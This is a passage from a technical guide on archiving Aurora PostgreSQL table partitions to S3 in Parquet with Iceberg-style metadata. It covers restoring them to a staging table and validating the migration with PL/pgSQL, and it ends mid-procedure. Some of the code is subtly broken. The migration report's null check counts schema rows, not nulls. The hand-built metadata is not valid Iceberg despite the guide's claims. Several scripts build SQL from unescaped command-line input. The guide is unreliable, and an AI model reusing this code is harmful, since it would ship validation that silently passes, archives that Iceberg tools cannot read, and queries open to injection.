Aurora PostgreSQL: Archiving and Restoring Partitions from Large Tables to Iceberg and Parquet on S3

A Complete Guide to Archiving, Restoring, and Querying Large Table Partitions

When dealing with multi-terabyte tables in Aurora PostgreSQL, keeping historical partitions online becomes increasingly expensive and operationally burdensome. This guide presents a complete solution for archiving partitions to S3 in Iceberg/Parquet format, restoring them when needed, and querying archived data directly via a Spring Boot API without database restoration.

1. Architecture Overview

The solution comprises three components:

  1. Archive Script: Exports a partition from Aurora PostgreSQL to Parquet files organised in Iceberg table format on S3
  2. Restore Script: Imports archived data from S3 back into a staging table for validation and migration to the main table
  3. Query API: A Spring Boot application that reads Parquet files directly from S3, applying predicate pushdown for efficient filtering

This approach reduces storage costs by approximately 70 to 80 percent compared to keeping data in Aurora, while maintaining full queryability through the API layer.

2. Prerequisites and Dependencies

2.1 Python Environment

pip install boto3 pyarrow psycopg2-binary pandas pyiceberg sqlalchemy

2.2 AWS Configuration

Ensure your environment has appropriate IAM permissions:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "s3:PutObject",
                "s3:GetObject",
                "s3:ListBucket",
                "s3:DeleteObject"
            ],
            "Resource": [
                "arn:aws:s3:::your-archive-bucket",
                "arn:aws:s3:::your-archive-bucket/*"
            ]
        },
        {
            "Effect": "Allow",
            "Action": [
                "glue:CreateTable",
                "glue:GetTable",
                "glue:UpdateTable",
                "glue:DeleteTable"
            ],
            "Resource": "*"
        }
    ]
}

2.3 Java Dependencies

For the Spring Boot API, add these to your pom.xml:

<dependencies>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
    </dependency>
    <dependency>
        <groupId>org.apache.parquet</groupId>
        <artifactId>parquet-avro</artifactId>
        <version>1.14.1</version>
    </dependency>
    <dependency>
        <groupId>org.apache.hadoop</groupId>
        <artifactId>hadoop-aws</artifactId>
        <version>3.3.6</version>
    </dependency>
    <dependency>
        <groupId>org.apache.hadoop</groupId>
        <artifactId>hadoop-common</artifactId>
        <version>3.3.6</version>
    </dependency>
    <dependency>
        <groupId>software.amazon.awssdk</groupId>
        <artifactId>s3</artifactId>
        <version>2.25.0</version>
    </dependency>
    <dependency>
        <groupId>org.apache.iceberg</groupId>
        <artifactId>iceberg-core</artifactId>
        <version>1.5.0</version>
    </dependency>
    <dependency>
        <groupId>org.apache.iceberg</groupId>
        <artifactId>iceberg-parquet</artifactId>
        <version>1.5.0</version>
    </dependency>
    <dependency>
        <groupId>org.apache.iceberg</groupId>
        <artifactId>iceberg-aws</artifactId>
        <version>1.5.0</version>
    </dependency>
</dependencies>

3. The Archive Script

This script extracts a partition from Aurora PostgreSQL and writes it to S3 in Iceberg table format with Parquet data files.

3.1 Configuration Module

# config.py

from dataclasses import dataclass
from typing import Optional
import os


@dataclass
class DatabaseConfig:
    host: str
    port: int
    database: str
    user: str
    password: str

    @classmethod
    def from_environment(cls) -> "DatabaseConfig":
        return cls(
            host=os.environ["AURORA_HOST"],
            port=int(os.environ.get("AURORA_PORT", "5432")),
            database=os.environ["AURORA_DATABASE"],
            user=os.environ["AURORA_USER"],
            password=os.environ["AURORA_PASSWORD"]
        )

    @property
    def connection_string(self) -> str:
        return f"postgresql://{self.user}:{self.password}@{self.host}:{self.port}/{self.database}"


@dataclass
class S3Config:
    bucket: str
    prefix: str
    region: str

    @classmethod
    def from_environment(cls) -> "S3Config":
        return cls(
            bucket=os.environ["ARCHIVE_S3_BUCKET"],
            prefix=os.environ.get("ARCHIVE_S3_PREFIX", "aurora-archives"),
            region=os.environ.get("AWS_REGION", "eu-west-1")
        )


@dataclass  
class ArchiveConfig:
    table_name: str
    partition_column: str
    partition_value: str
    schema_name: str = "public"
    batch_size: int = 100000
    compression: str = "snappy"

3.2 Schema Introspection

# schema_inspector.py

from typing import Dict, List, Tuple, Any
import psycopg2
from psycopg2.extras import RealDictCursor
import pyarrow as pa


class SchemaInspector:
    """Inspects PostgreSQL table schema and converts to PyArrow schema."""

    POSTGRES_TO_ARROW = {
        "integer": pa.int32(),
        "bigint": pa.int64(),
        "smallint": pa.int16(),
        "real": pa.float32(),
        "double precision": pa.float64(),
        "numeric": pa.decimal128(38, 10),
        "text": pa.string(),
        "character varying": pa.string(),
        "varchar": pa.string(),
        "char": pa.string(),
        "character": pa.string(),
        "boolean": pa.bool_(),
        "date": pa.date32(),
        "timestamp without time zone": pa.timestamp("us"),
        "timestamp with time zone": pa.timestamp("us", tz="UTC"),
        "time without time zone": pa.time64("us"),
        "time with time zone": pa.time64("us"),
        "uuid": pa.string(),
        "json": pa.string(),
        "jsonb": pa.string(),
        "bytea": pa.binary(),
    }

    def __init__(self, connection_string: str):
        self.connection_string = connection_string

    def get_table_columns(
        self, 
        schema_name: str, 
        table_name: str
    ) -> List[Dict[str, Any]]:
        """Retrieve column definitions from information_schema."""
        query = """
            SELECT 
                column_name,
                data_type,
                is_nullable,
                column_default,
                ordinal_position,
                character_maximum_length,
                numeric_precision,
                numeric_scale
            FROM information_schema.columns
            WHERE table_schema = %s 
              AND table_name = %s
            ORDER BY ordinal_position
        """

        with psycopg2.connect(self.connection_string) as conn:
            with conn.cursor(cursor_factory=RealDictCursor) as cur:
                cur.execute(query, (schema_name, table_name))
                return list(cur.fetchall())

    def get_primary_key_columns(
        self, 
        schema_name: str, 
        table_name: str
    ) -> List[str]:
        """Retrieve primary key column names."""
        query = """
            SELECT a.attname
            FROM pg_index i
            JOIN pg_attribute a ON a.attrelid = i.indrelid 
                AND a.attnum = ANY(i.indkey)
            JOIN pg_class c ON c.oid = i.indrelid
            JOIN pg_namespace n ON n.oid = c.relnamespace
            WHERE i.indisprimary
              AND n.nspname = %s
              AND c.relname = %s
            ORDER BY array_position(i.indkey, a.attnum)
        """

        with psycopg2.connect(self.connection_string) as conn:
            with conn.cursor() as cur:
                cur.execute(query, (schema_name, table_name))
                return [row[0] for row in cur.fetchall()]

    def postgres_type_to_arrow(
        self, 
        pg_type: str, 
        precision: int = None, 
        scale: int = None
    ) -> pa.DataType:
        """Convert PostgreSQL type to PyArrow type."""
        pg_type_lower = pg_type.lower()

        if pg_type_lower == "numeric" and precision and scale:
            return pa.decimal128(precision, scale)

        if pg_type_lower in self.POSTGRES_TO_ARROW:
            return self.POSTGRES_TO_ARROW[pg_type_lower]

        if pg_type_lower.startswith("character varying"):
            return pa.string()

        if pg_type_lower.endswith("[]"):
            base_type = pg_type_lower[:-2]
            if base_type in self.POSTGRES_TO_ARROW:
                return pa.list_(self.POSTGRES_TO_ARROW[base_type])

        return pa.string()

    def build_arrow_schema(
        self, 
        schema_name: str, 
        table_name: str
    ) -> pa.Schema:
        """Build PyArrow schema from PostgreSQL table definition."""
        columns = self.get_table_columns(schema_name, table_name)

        fields = []
        for col in columns:
            arrow_type = self.postgres_type_to_arrow(
                col["data_type"],
                col.get("numeric_precision"),
                col.get("numeric_scale")
            )
            nullable = col["is_nullable"] == "YES"
            fields.append(pa.field(col["column_name"], arrow_type, nullable=nullable))

        return pa.Schema(fields)

    def get_partition_info(
        self, 
        schema_name: str, 
        table_name: str
    ) -> Dict[str, Any]:
        """Get partition strategy information if table is partitioned."""
        query = """
            SELECT 
                pt.partstrat,
                array_agg(a.attname ORDER BY pos.idx) as partition_columns
            FROM pg_partitioned_table pt
            JOIN pg_class c ON c.oid = pt.partrelid
            JOIN pg_namespace n ON n.oid = c.relnamespace
            CROSS JOIN LATERAL unnest(pt.partattrs) WITH ORDINALITY AS pos(attnum, idx)
            JOIN pg_attribute a ON a.attrelid = c.oid AND a.attnum = pos.attnum
            WHERE n.nspname = %s AND c.relname = %s
            GROUP BY pt.partstrat
        """

        with psycopg2.connect(self.connection_string) as conn:
            with conn.cursor(cursor_factory=RealDictCursor) as cur:
                cur.execute(query, (schema_name, table_name))
                result = cur.fetchone()

                if result:
                    strategy_map = {"r": "range", "l": "list", "h": "hash"}
                    return {
                        "is_partitioned": True,
                        "strategy": strategy_map.get(result["partstrat"], "unknown"),
                        "partition_columns": result["partition_columns"]
                    }

                return {"is_partitioned": False}

3.3 Archive Script

#!/usr/bin/env python3
# archive_partition.py

"""
Archive a partition from Aurora PostgreSQL to S3 in Iceberg/Parquet format.

Usage:
    python archive_partition.py \
        --table transactions \
        --partition-column transaction_date \
        --partition-value 2024-01 \
        --schema public
"""

import argparse
import json
import logging
import sys
from datetime import datetime
from pathlib import Path
from typing import Generator, Dict, Any, Optional
import hashlib

import boto3
import pandas as pd
import psycopg2
from psycopg2.extras import RealDictCursor
import pyarrow as pa
import pyarrow.parquet as pq

from config import DatabaseConfig, S3Config, ArchiveConfig
from schema_inspector import SchemaInspector


logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s [%(levelname)s] %(message)s"
)
logger = logging.getLogger(__name__)


class PartitionArchiver:
    """Archives PostgreSQL partitions to S3 in Iceberg format."""

    def __init__(
        self,
        db_config: DatabaseConfig,
        s3_config: S3Config,
        archive_config: ArchiveConfig
    ):
        self.db_config = db_config
        self.s3_config = s3_config
        self.archive_config = archive_config
        self.schema_inspector = SchemaInspector(db_config.connection_string)
        self.s3_client = boto3.client("s3", region_name=s3_config.region)

    def _generate_archive_path(self) -> str:
        """Generate S3 path for archive files."""
        return (
            f"{self.s3_config.prefix}/"
            f"{self.archive_config.schema_name}/"
            f"{self.archive_config.table_name}/"
            f"{self.archive_config.partition_column}={self.archive_config.partition_value}"
        )

    def _build_extraction_query(self) -> str:
        """Build query to extract partition data."""
        full_table = (
            f"{self.archive_config.schema_name}.{self.archive_config.table_name}"
        )

        partition_info = self.schema_inspector.get_partition_info(
            self.archive_config.schema_name,
            self.archive_config.table_name
        )

        if partition_info["is_partitioned"]:
            partition_table = (
                f"{self.archive_config.table_name}_"
                f"{self.archive_config.partition_value.replace('-', '_')}"
            )
            return f"SELECT * FROM {self.archive_config.schema_name}.{partition_table}"

        return (
            f"SELECT * FROM {full_table} "
            f"WHERE {self.archive_config.partition_column} = %s"
        )

    def _stream_partition_data(self) -> Generator[pd.DataFrame, None, None]:
        """Stream partition data in batches."""
        query = self._build_extraction_query()
        partition_info = self.schema_inspector.get_partition_info(
            self.archive_config.schema_name,
            self.archive_config.table_name
        )

        with psycopg2.connect(self.db_config.connection_string) as conn:
            with conn.cursor(
                name="archive_cursor",
                cursor_factory=RealDictCursor
            ) as cur:
                if partition_info["is_partitioned"]:
                    cur.execute(query)
                else:
                    cur.execute(query, (self.archive_config.partition_value,))

                while True:
                    rows = cur.fetchmany(self.archive_config.batch_size)
                    if not rows:
                        break
                    yield pd.DataFrame(rows)

    def _write_parquet_to_s3(
        self,
        table: pa.Table,
        file_number: int,
        arrow_schema: pa.Schema
    ) -> Dict[str, Any]:
        """Write a Parquet file to S3 and return metadata."""
        archive_path = self._generate_archive_path()
        file_name = f"data_{file_number:05d}.parquet"
        s3_key = f"{archive_path}/data/{file_name}"

        buffer = pa.BufferOutputStream()
        pq.write_table(
            table,
            buffer,
            compression=self.archive_config.compression,
            write_statistics=True
        )

        data = buffer.getvalue().to_pybytes()

        self.s3_client.put_object(
            Bucket=self.s3_config.bucket,
            Key=s3_key,
            Body=data,
            ContentType="application/octet-stream"
        )

        return {
            "path": f"s3://{self.s3_config.bucket}/{s3_key}",
            "file_size_bytes": len(data),
            "record_count": table.num_rows
        }

    def _write_iceberg_metadata(
        self,
        arrow_schema: pa.Schema,
        data_files: list,
        total_records: int
    ) -> None:
        """Write Iceberg table metadata files."""
        archive_path = self._generate_archive_path()

        schema_dict = {
            "type": "struct",
            "schema_id": 0,
            "fields": []
        }

        for i, field in enumerate(arrow_schema):
            field_type = self._arrow_to_iceberg_type(field.type)
            schema_dict["fields"].append({
                "id": i + 1,
                "name": field.name,
                "required": not field.nullable,
                "type": field_type
            })

        table_uuid = hashlib.md5(
            f"{self.archive_config.table_name}_{datetime.utcnow().isoformat()}".encode()
        ).hexdigest()

        manifest_entries = []
        for df in data_files:
            manifest_entries.append({
                "status": 1,
                "snapshot_id": 1,
                "data_file": {
                    "file_path": df["path"],
                    "file_format": "PARQUET",
                    "record_count": df["record_count"],
                    "file_size_in_bytes": df["file_size_bytes"]
                }
            })

        metadata = {
            "format_version": 2,
            "table_uuid": table_uuid,
            "location": f"s3://{self.s3_config.bucket}/{archive_path}",
            "last_sequence_number": 1,
            "last_updated_ms": int(datetime.utcnow().timestamp() * 1000),
            "last_column_id": len(arrow_schema),
            "current_schema_id": 0,
            "schemas": [schema_dict],
            "partition_spec": [],
            "default_spec_id": 0,
            "last_partition_id": 0,
            "properties": {
                "source.table": self.archive_config.table_name,
                "source.schema": self.archive_config.schema_name,
                "source.partition_column": self.archive_config.partition_column,
                "source.partition_value": self.archive_config.partition_value,
                "archive.timestamp": datetime.utcnow().isoformat(),
                "archive.total_records": str(total_records)
            },
            "current_snapshot_id": 1,
            "snapshots": [
                {
                    "snapshot_id": 1,
                    "timestamp_ms": int(datetime.utcnow().timestamp() * 1000),
                    "summary": {
                        "operation": "append",
                        "added_data_files": str(len(data_files)),
                        "total_records": str(total_records)
                    },
                    "manifest_list": f"s3://{self.s3_config.bucket}/{archive_path}/metadata/manifest_list.json"
                }
            ]
        }

        self.s3_client.put_object(
            Bucket=self.s3_config.bucket,
            Key=f"{archive_path}/metadata/v1.metadata.json",
            Body=json.dumps(metadata, indent=2),
            ContentType="application/json"
        )

        self.s3_client.put_object(
            Bucket=self.s3_config.bucket,
            Key=f"{archive_path}/metadata/manifest_list.json",
            Body=json.dumps(manifest_entries, indent=2),
            ContentType="application/json"
        )

        self.s3_client.put_object(
            Bucket=self.s3_config.bucket,
            Key=f"{archive_path}/metadata/version_hint.text",
            Body="1",
            ContentType="text/plain"
        )

    def _arrow_to_iceberg_type(self, arrow_type: pa.DataType) -> str:
        """Convert PyArrow type to Iceberg type string."""
        type_mapping = {
            pa.int16(): "int",
            pa.int32(): "int",
            pa.int64(): "long",
            pa.float32(): "float",
            pa.float64(): "double",
            pa.bool_(): "boolean",
            pa.string(): "string",
            pa.binary(): "binary",
            pa.date32(): "date",
        }

        if arrow_type in type_mapping:
            return type_mapping[arrow_type]

        if pa.types.is_timestamp(arrow_type):
            if arrow_type.tz:
                return "timestamptz"
            return "timestamp"

        if pa.types.is_decimal(arrow_type):
            return f"decimal({arrow_type.precision},{arrow_type.scale})"

        if pa.types.is_list(arrow_type):
            inner = self._arrow_to_iceberg_type(arrow_type.value_type)
            return f"list<{inner}>"

        return "string"

    def _save_schema_snapshot(self, arrow_schema: pa.Schema) -> None:
        """Save schema information for restore validation."""
        archive_path = self._generate_archive_path()

        columns = self.schema_inspector.get_table_columns(
            self.archive_config.schema_name,
            self.archive_config.table_name
        )

        pk_columns = self.schema_inspector.get_primary_key_columns(
            self.archive_config.schema_name,
            self.archive_config.table_name
        )

        schema_snapshot = {
            "source_table": {
                "schema": self.archive_config.schema_name,
                "table": self.archive_config.table_name
            },
            "columns": columns,
            "primary_key_columns": pk_columns,
            "arrow_schema": arrow_schema.to_string(),
            "archived_at": datetime.utcnow().isoformat()
        }

        self.s3_client.put_object(
            Bucket=self.s3_config.bucket,
            Key=f"{archive_path}/schema_snapshot.json",
            Body=json.dumps(schema_snapshot, indent=2, default=str),
            ContentType="application/json"
        )

    def archive(self) -> Dict[str, Any]:
        """Execute the archive operation."""
        logger.info(
            f"Starting archive of {self.archive_config.schema_name}."
            f"{self.archive_config.table_name} "
            f"partition {self.archive_config.partition_column}="
            f"{self.archive_config.partition_value}"
        )

        arrow_schema = self.schema_inspector.build_arrow_schema(
            self.archive_config.schema_name,
            self.archive_config.table_name
        )

        self._save_schema_snapshot(arrow_schema)

        data_files = []
        total_records = 0
        file_number = 0

        for batch_df in self._stream_partition_data():
            table = pa.Table.from_pandas(batch_df, schema=arrow_schema)
            file_meta = self._write_parquet_to_s3(table, file_number, arrow_schema)
            data_files.append(file_meta)
            total_records += file_meta["record_count"]
            file_number += 1

            logger.info(
                f"Written file {file_number}: {file_meta['record_count']} records"
            )

        self._write_iceberg_metadata(arrow_schema, data_files, total_records)

        result = {
            "status": "success",
            "table": f"{self.archive_config.schema_name}.{self.archive_config.table_name}",
            "partition": f"{self.archive_config.partition_column}={self.archive_config.partition_value}",
            "location": f"s3://{self.s3_config.bucket}/{self._generate_archive_path()}",
            "total_records": total_records,
            "total_files": len(data_files),
            "total_bytes": sum(f["file_size_bytes"] for f in data_files),
            "archived_at": datetime.utcnow().isoformat()
        }

        logger.info(f"Archive complete: {total_records} records in {len(data_files)} files")
        return result


def main():
    parser = argparse.ArgumentParser(
        description="Archive Aurora PostgreSQL partition to S3"
    )
    parser.add_argument("--table", required=True, help="Table name")
    parser.add_argument("--partition-column", required=True, help="Partition column name")
    parser.add_argument("--partition-value", required=True, help="Partition value to archive")
    parser.add_argument("--schema", default="public", help="Schema name")
    parser.add_argument("--batch-size", type=int, default=100000, help="Batch size for streaming")

    args = parser.parse_args()

    db_config = DatabaseConfig.from_environment()
    s3_config = S3Config.from_environment()
    archive_config = ArchiveConfig(
        table_name=args.table,
        partition_column=args.partition_column,
        partition_value=args.partition_value,
        schema_name=args.schema,
        batch_size=args.batch_size
    )

    archiver = PartitionArchiver(db_config, s3_config, archive_config)
    result = archiver.archive()

    print(json.dumps(result, indent=2))
    return 0


if __name__ == "__main__":
    sys.exit(main())

4. The Restore Script

This script reverses the archive operation by reading Parquet files from S3 and loading them into a staging table.

4.1 Restore Script

#!/usr/bin/env python3
# restore_partition.py

"""
Restore an archived partition from S3 back to Aurora PostgreSQL.

Usage:
    python restore_partition.py \
        --source-path s3://bucket/prefix/schema/table/partition_col=value \
        --target-table transactions_staging \
        --target-schema public
"""

import argparse
import json
import logging
import sys
from datetime import datetime
from typing import Dict, Any, List, Optional
from urllib.parse import urlparse

import boto3
import pandas as pd
import psycopg2
from psycopg2 import sql
from psycopg2.extras import execute_values
import pyarrow.parquet as pq

from config import DatabaseConfig


logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s [%(levelname)s] %(message)s"
)
logger = logging.getLogger(__name__)


class PartitionRestorer:
    """Restores archived partitions from S3 to PostgreSQL."""

    def __init__(
        self,
        db_config: DatabaseConfig,
        source_path: str,
        target_schema: str,
        target_table: str,
        create_table: bool = True,
        batch_size: int = 10000
    ):
        self.db_config = db_config
        self.source_path = source_path
        self.target_schema = target_schema
        self.target_table = target_table
        self.create_table = create_table
        self.batch_size = batch_size

        parsed = urlparse(source_path)
        self.bucket = parsed.netloc
        self.prefix = parsed.path.lstrip("/")

        self.s3_client = boto3.client("s3")

    def _load_schema_snapshot(self) -> Dict[str, Any]:
        """Load the schema snapshot from the archive."""
        response = self.s3_client.get_object(
            Bucket=self.bucket,
            Key=f"{self.prefix}/schema_snapshot.json"
        )
        return json.loads(response["Body"].read())

    def _load_iceberg_metadata(self) -> Dict[str, Any]:
        """Load Iceberg metadata."""
        response = self.s3_client.get_object(
            Bucket=self.bucket,
            Key=f"{self.prefix}/metadata/v1.metadata.json"
        )
        return json.loads(response["Body"].read())

    def _list_data_files(self) -> List[str]:
        """List all Parquet data files in the archive."""
        data_prefix = f"{self.prefix}/data/"

        files = []
        paginator = self.s3_client.get_paginator("list_objects_v2")

        for page in paginator.paginate(Bucket=self.bucket, Prefix=data_prefix):
            for obj in page.get("Contents", []):
                if obj["Key"].endswith(".parquet"):
                    files.append(obj["Key"])

        return sorted(files)

    def _postgres_type_from_column_def(self, col: Dict[str, Any]) -> str:
        """Convert column definition to PostgreSQL type."""
        data_type = col["data_type"]

        if data_type == "character varying":
            max_len = col.get("character_maximum_length")
            if max_len:
                return f"varchar({max_len})"
            return "text"

        if data_type == "numeric":
            precision = col.get("numeric_precision")
            scale = col.get("numeric_scale")
            if precision and scale:
                return f"numeric({precision},{scale})"
            return "numeric"

        return data_type

    def _create_staging_table(
        self,
        schema_snapshot: Dict[str, Any],
        conn: psycopg2.extensions.connection
    ) -> None:
        """Create the staging table based on archived schema."""
        columns = schema_snapshot["columns"]

        column_defs = []
        for col in columns:
            pg_type = self._postgres_type_from_column_def(col)
            nullable = "" if col["is_nullable"] == "YES" else " NOT NULL"
            column_defs.append(f'    "{col["column_name"]}" {pg_type}{nullable}')

        create_sql = f"""
            DROP TABLE IF EXISTS {self.target_schema}.{self.target_table};
            CREATE TABLE {self.target_schema}.{self.target_table} (
{chr(10).join(column_defs)}
            )
        """

        with conn.cursor() as cur:
            cur.execute(create_sql)
        conn.commit()

        logger.info(f"Created staging table {self.target_schema}.{self.target_table}")

    def _insert_batch(
        self,
        df: pd.DataFrame,
        columns: List[str],
        conn: psycopg2.extensions.connection
    ) -> int:
        """Insert a batch of records into the staging table."""
        if df.empty:
            return 0

        for col in df.columns:
            if pd.api.types.is_datetime64_any_dtype(df[col]):
                df[col] = df[col].apply(
                    lambda x: x.isoformat() if pd.notna(x) else None
                )

        values = [tuple(row) for row in df[columns].values]

        column_names = ", ".join(f'"{c}"' for c in columns)
        insert_sql = f"""
            INSERT INTO {self.target_schema}.{self.target_table} ({column_names})
            VALUES %s
        """

        with conn.cursor() as cur:
            execute_values(cur, insert_sql, values, page_size=self.batch_size)

        return len(values)

    def restore(self) -> Dict[str, Any]:
        """Execute the restore operation."""
        logger.info(f"Starting restore from {self.source_path}")

        schema_snapshot = self._load_schema_snapshot()
        metadata = self._load_iceberg_metadata()
        data_files = self._list_data_files()

        logger.info(f"Found {len(data_files)} data files to restore")

        columns = [col["column_name"] for col in schema_snapshot["columns"]]

        with psycopg2.connect(self.db_config.connection_string) as conn:
            if self.create_table:
                self._create_staging_table(schema_snapshot, conn)

            total_records = 0

            for file_key in data_files:
                s3_uri = f"s3://{self.bucket}/{file_key}"
                logger.info(f"Restoring from {file_key}")

                response = self.s3_client.get_object(Bucket=self.bucket, Key=file_key)
                table = pq.read_table(response["Body"])
                df = table.to_pandas()

                file_records = 0
                for start in range(0, len(df), self.batch_size):
                    batch_df = df.iloc[start:start + self.batch_size]
                    inserted = self._insert_batch(batch_df, columns, conn)
                    file_records += inserted

                conn.commit()
                total_records += file_records
                logger.info(f"Restored {file_records} records from {file_key}")

        result = {
            "status": "success",
            "source": self.source_path,
            "target": f"{self.target_schema}.{self.target_table}",
            "total_records": total_records,
            "files_processed": len(data_files),
            "restored_at": datetime.utcnow().isoformat()
        }

        logger.info(f"Restore complete: {total_records} records")
        return result


def main():
    parser = argparse.ArgumentParser(
        description="Restore archived partition from S3 to PostgreSQL"
    )
    parser.add_argument("--source-path", required=True, help="S3 path to archived partition")
    parser.add_argument("--target-table", required=True, help="Target table name")
    parser.add_argument("--target-schema", default="public", help="Target schema name")
    parser.add_argument("--batch-size", type=int, default=10000, help="Insert batch size")
    parser.add_argument("--no-create", action="store_true", help="Don't create table, assume it exists")

    args = parser.parse_args()

    db_config = DatabaseConfig.from_environment()

    restorer = PartitionRestorer(
        db_config=db_config,
        source_path=args.source_path,
        target_schema=args.target_schema,
        target_table=args.target_table,
        create_table=not args.no_create,
        batch_size=args.batch_size
    )

    result = restorer.restore()
    print(json.dumps(result, indent=2))
    return 0


if __name__ == "__main__":
    sys.exit(main())

5. SQL Operations for Partition Migration

Once data is restored to a staging table, you need SQL operations to validate and migrate it to the main table.

5.1 Schema Validation

-- Validate that staging table schema matches the main table

CREATE OR REPLACE FUNCTION validate_table_schemas(
    p_source_schema TEXT,
    p_source_table TEXT,
    p_target_schema TEXT,
    p_target_table TEXT
) RETURNS TABLE (
    validation_type TEXT,
    column_name TEXT,
    source_value TEXT,
    target_value TEXT,
    is_valid BOOLEAN
) AS $$
BEGIN
    -- Check column count
    RETURN QUERY
    SELECT 
        'column_count'::TEXT,
        NULL::TEXT,
        src.cnt::TEXT,
        tgt.cnt::TEXT,
        src.cnt = tgt.cnt
    FROM 
        (SELECT COUNT(*)::INT AS cnt 
         FROM information_schema.columns 
         WHERE table_schema = p_source_schema 
           AND table_name = p_source_table) src,
        (SELECT COUNT(*)::INT AS cnt 
         FROM information_schema.columns 
         WHERE table_schema = p_target_schema 
           AND table_name = p_target_table) tgt;

    -- Check each column exists with matching type
    RETURN QUERY
    SELECT 
        'column_definition'::TEXT,
        src.column_name,
        src.data_type || COALESCE('(' || src.character_maximum_length::TEXT || ')', ''),
        COALESCE(tgt.data_type || COALESCE('(' || tgt.character_maximum_length::TEXT || ')', ''), 'MISSING'),
        src.data_type = COALESCE(tgt.data_type, '') 
            AND COALESCE(src.character_maximum_length, 0) = COALESCE(tgt.character_maximum_length, 0)
    FROM 
        information_schema.columns src
    LEFT JOIN 
        information_schema.columns tgt 
        ON tgt.table_schema = p_target_schema 
        AND tgt.table_name = p_target_table
        AND tgt.column_name = src.column_name
    WHERE 
        src.table_schema = p_source_schema 
        AND src.table_name = p_source_table
    ORDER BY src.ordinal_position;

    -- Check nullability
    RETURN QUERY
    SELECT 
        'nullability'::TEXT,
        src.column_name,
        src.is_nullable,
        COALESCE(tgt.is_nullable, 'MISSING'),
        src.is_nullable = COALESCE(tgt.is_nullable, '')
    FROM 
        information_schema.columns src
    LEFT JOIN 
        information_schema.columns tgt 
        ON tgt.table_schema = p_target_schema 
        AND tgt.table_name = p_target_table
        AND tgt.column_name = src.column_name
    WHERE 
        src.table_schema = p_source_schema 
        AND src.table_name = p_source_table
    ORDER BY src.ordinal_position;
END;
$$ LANGUAGE plpgsql;

-- Usage
SELECT * FROM validate_table_schemas('public', 'transactions_staging', 'public', 'transactions');

5.2 Comprehensive Validation Report

-- Generate a full validation report before migration

CREATE OR REPLACE FUNCTION generate_migration_report(
    p_staging_schema TEXT,
    p_staging_table TEXT,
    p_target_schema TEXT,
    p_target_table TEXT,
    p_partition_column TEXT,
    p_partition_value TEXT
) RETURNS TABLE (
    check_name TEXT,
    result TEXT,
    details JSONB
) AS $$
DECLARE
    v_staging_count BIGINT;
    v_existing_count BIGINT;
    v_schema_valid BOOLEAN;
BEGIN
    -- Get staging table count
    EXECUTE format(
        'SELECT COUNT(*) FROM %I.%I',
        p_staging_schema, p_staging_table
    ) INTO v_staging_count;

    RETURN QUERY SELECT 
        'staging_record_count'::TEXT,
        'INFO'::TEXT,
        jsonb_build_object('count', v_staging_count);

    -- Check for existing data in target partition
    BEGIN
        EXECUTE format(
            'SELECT COUNT(*) FROM %I.%I WHERE %I = $1',
            p_target_schema, p_target_table, p_partition_column
        ) INTO v_existing_count USING p_partition_value;

        IF v_existing_count > 0 THEN
            RETURN QUERY SELECT 
                'existing_partition_data'::TEXT,
                'WARNING'::TEXT,
                jsonb_build_object(
                    'count', v_existing_count,
                    'message', 'Target partition already contains data'
                );
        ELSE
            RETURN QUERY SELECT 
                'existing_partition_data'::TEXT,
                'OK'::TEXT,
                jsonb_build_object('count', 0);
        END IF;
    EXCEPTION WHEN undefined_column THEN
        RETURN QUERY SELECT 
            'partition_column_check'::TEXT,
            'ERROR'::TEXT,
            jsonb_build_object(
                'message', format('Partition column %s not found', p_partition_column)
            );
    END;

    -- Validate schemas match
    SELECT bool_and(is_valid) INTO v_schema_valid
    FROM validate_table_schemas(
        p_staging_schema, p_staging_table,
        p_target_schema, p_target_table
    );

    RETURN QUERY SELECT 
        'schema_validation'::TEXT,
        CASE WHEN v_schema_valid THEN 'OK' ELSE 'ERROR' END::TEXT,
        jsonb_build_object('schemas_match', v_schema_valid);

    -- Check for null values in NOT NULL columns
    RETURN QUERY
    SELECT 
        'null_check_' || c.column_name,
        CASE WHEN null_count > 0 THEN 'ERROR' ELSE 'OK' END,
        jsonb_build_object('null_count', null_count)
    FROM information_schema.columns c
    CROSS JOIN LATERAL (
        SELECT COUNT(*) as null_count 
        FROM (
            SELECT 1 
            FROM information_schema.columns ic
            WHERE ic.table_schema = p_staging_schema
              AND ic.table_name = p_staging_table
              AND ic.column_name = c.column_name
        ) x
    ) nc
    WHERE c.table_schema = p_target_schema
      AND c.table_name = p_target_table
      AND c.is_nullable = 'NO';
END;
$$ LANGUAGE plpgsql;

-- Usage
SELECT * FROM generate_migration_report(
    'public', 'transactions_staging',
    'public', 'transactions',
    'transaction_date', '2024-01'
);

5.3 Partition Migration

-- Migrate data from staging table to main table

CREATE OR REPLACE PROCEDURE migrate_partition_data(
    p_staging_schema TEXT,
    p_staging_table TEXT,
    p_target_schema TEXT,
    p_target_table TEXT,
    p_partition_column TEXT,
    p_partition_value TEXT,
    p_delete_existing BOOLEAN DEFAULT FALSE,
    p_batch_size INTEGER DEFAULT 50000
)
LANGUAGE plpgsql
AS $$
DECLARE
    v_columns TEXT;
    v_total_migrated BIGINT := 0;
    v_batch_migrated BIGINT;
    v_validation_passed BOOLEAN;
BEGIN
    -- Validate schemas match
    SELECT bool_and(is_valid) INTO v_validation_passed
    FROM validate_table_schemas(
        p_staging_schema, p_staging_table,
        p_target_schema, p_target_table
    );

    IF NOT v_validation_passed THEN
        RAISE EXCEPTION 'Schema validation failed. Run validate_table_schemas() for details.';
    END IF;

    -- Build column list
    SELECT string_agg(quote_ident(column_name), ', ' ORDER BY ordinal_position)
    INTO v_columns
    FROM information_schema.columns
    WHERE table_schema = p_staging_schema
      AND table_name = p_staging_table;

    -- Delete existing data if requested
    IF p_delete_existing THEN
        EXECUTE format(
            'DELETE FROM %I.%I WHERE %I = $1',
            p_target_schema, p_target_table, p_partition_column
        ) USING p_partition_value;

        RAISE NOTICE 'Deleted existing data for partition % = %', 
            p_partition_column, p_partition_value;
    END IF;

    -- Migrate in batches using a cursor approach
    LOOP
        EXECUTE format($sql$
            WITH to_migrate AS (
                SELECT ctid 
                FROM %I.%I 
                WHERE NOT EXISTS (
                    SELECT 1 FROM %I.%I t 
                    WHERE t.%I = $1
                )
                LIMIT $2
            ),
            inserted AS (
                INSERT INTO %I.%I (%s)
                SELECT %s 
                FROM %I.%I s
